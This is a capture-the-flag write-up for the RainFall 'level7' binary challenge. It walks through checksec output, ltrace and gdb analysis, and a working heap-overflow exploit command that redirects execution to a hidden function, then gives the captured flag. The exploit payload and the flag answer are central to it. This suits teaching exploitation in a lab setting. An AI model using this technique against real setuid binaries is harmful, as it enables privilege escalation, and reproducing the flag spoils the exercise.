After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level7/level7
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 level8 users 5648 Mar  9  2016 level7
```

Using `objdump` and `radar` tools find out that there are two functions inside `main` and `m`.
![alt text](./Resources/main_1.png "main_1 function")
![alt text](./Resources/main_2.png "main_2 function")
![alt text](./Resources/main_3.png "main_3 function")
![alt text](./Resources/m.png "m function")

After analyzation binary with `radar` tool I figure out how can I exploit (see `source.c`).

So first I need to find the size of the payload needed to override the address for the second `strcpy` function call.
```
level7@RainFall:~$ ltrace ./level7 $(python -c 'print "A"*21 ') 1
__libc_start_main(0x8048521, 3, 0xbffff6d4, 0x8048610, 0x8048680 <unfinished ...>
malloc(8)                                                        = 0x0804a008
malloc(8)                                                        = 0x0804a018
malloc(8)                                                        = 0x0804a028
malloc(8)                                                        = 0x0804a038
strcpy(0x0804a018, "AAAAAAAAAAAAAAAAAAAAA")                      = 0x0804a018
strcpy(0x08040041, "1" <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
```

Next I need to find `ret` address inside `main` function.
```
(gdb) info frame
Stack level 0, frame at 0xbffff640:
 eip = 0x8048524 in main; saved eip 0xb7e454d3
 Arglist at 0xbffff638, args:
 Locals at 0xbffff638, Previous frame's sp is 0xbffff640
 Saved registers:
  ebp at 0xbffff638, eip at 0xbffff63c
```

Using `objdump` I find out `m` function address - `0x080484f4`

Now everything ready for exploit.
```
level7@RainFall:~$ ./level7 $(python -c 'print "A"*20 + "\x3C\xF6\xFF\xBF" ') $(python -c 'print "\xF4\x84\x04\x08" ')
~~
5684af5cb4c8679958be4abe6373147ab52d95768e047820bf382e44fa8d8fb9
 - 1588615406
Segmentation fault (core dumped)
```

Flag: `5684af5cb4c8679958be4abe6373147ab52d95768e047820bf382e44fa8d8fb9`